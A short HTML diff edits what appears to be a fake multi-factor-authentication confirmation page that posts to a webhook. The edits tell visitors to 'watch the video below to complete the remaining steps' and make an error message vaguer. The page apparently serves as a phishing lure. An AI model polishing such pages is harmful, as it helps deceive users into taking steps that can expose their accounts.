--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
             font-family: Arial, sans-serif;
             margin: 0;
             padding: 0;
-            background-color: #f4f4f9;
+            background-color: #ffffff;
             color: #333;
             text-align: center;
         }
@@ -45,7 +45,7 @@
     </div>
     <div class="content">
         <h1>Thank You for Activating Your Multi-Factor Authentication!</h1>
-        <p>Your request is being processed. We will notify you once complete.</p>
+        <p>Please watch the video below to complete the remaining steps.</p>
         
         <!-- Embedded content area -->
         <div class="embedded">
@@ -77,7 +77,7 @@
                 console.log('Error:', error);
             });
     } else {
-        document.body.innerHTML += '<p>Error: No webhook URL provided.</p>';
+        document.body.innerHTML += '<p>Error: Invalid Request.</p>';
     }
 </script>
 </body>
